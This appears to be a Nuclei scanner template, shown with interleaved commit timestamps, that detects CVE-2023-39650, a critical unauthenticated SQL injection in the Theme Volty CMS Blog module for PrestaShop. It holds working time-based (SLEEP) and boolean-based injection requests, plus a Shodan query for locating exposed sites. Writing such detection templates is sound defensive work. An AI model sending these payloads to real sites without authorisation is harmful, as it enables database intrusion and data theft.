2024-09-19 08:22:48 +00:00
id : CVE-2023-39650
info :
name : PrestaShop Theme Volty CMS Blog - SQL Injection
author : mastercho
severity : critical
description : |
In the module 'Theme Volty CMS Blog' (tvcmsblog) up to versions 4.0.1 from Theme Volty for PrestaShop, a guest can perform SQL injection in affected versions.
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
reference :
- https://security.friendsofpresta.org/modules/2023/08/24/tvcmsblog.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-39650
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2023-39650
cwe-id : CWE-89
epss-score : 0.04685
epss-percentile : 0.91818
metadata :
max-request : 1
verified : true
framework : prestashop
shodan-query : html:"/tvcmsblog"
tags : cve,cve2023,prestashop,sqli,tvcmsblog
2024-09-12 08:55:38 +00:00
http :
- raw :
- |
@timeout : 20s
2024-10-12 15:37:14 +00:00
GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+(SELECT+7826+FROM+(SELECT(SLEEP(8)))oqFL)--+yxoW HTTP/1.1
2024-09-19 08:12:01 +00:00
Host : {{Hostname}}
Origin : {{BaseURL}}
- |
@timeout : 20s
GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+5484=5484--+xhCs HTTP/1.1
Host : {{Hostname}}
Origin : {{BaseURL}}
- |
@timeout : 20s
GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+5484=5485--+xhCs HTTP/1.1
2024-09-12 08:55:38 +00:00
Host : {{Hostname}}
2024-09-19 08:12:01 +00:00
Origin : {{BaseURL}}
2024-09-12 08:55:38 +00:00
host-redirects : true
matchers :
- type : dsl
name : time-based
dsl :
2024-10-12 15:37:14 +00:00
- 'duration_1>=8'
2024-09-19 08:12:01 +00:00
- 'status_code_1 == 200 && contains(body_1, "tvcmsblog")'
condition : and
- type : dsl
name : blind-based
dsl :
- 'status_code_2 == 200 && contains(body_2, "tvcmsblog")'
- 'status_code_2 == 200 && status_code_3 == 302'
2024-09-12 08:55:38 +00:00
condition : and
2024-10-12 15:37:14 +00:00
# digest: 4b0a00483046022100d836d1ae691f5a69f7bb0f843015b327c7bf075bcc534b89dba1e6bd2266109d022100d2eeba3d7626001ddc46d70cdcbce9f19d5f91678fcabcaa3b4fab576317760b:922c64590222798bb761d5b6d8e72950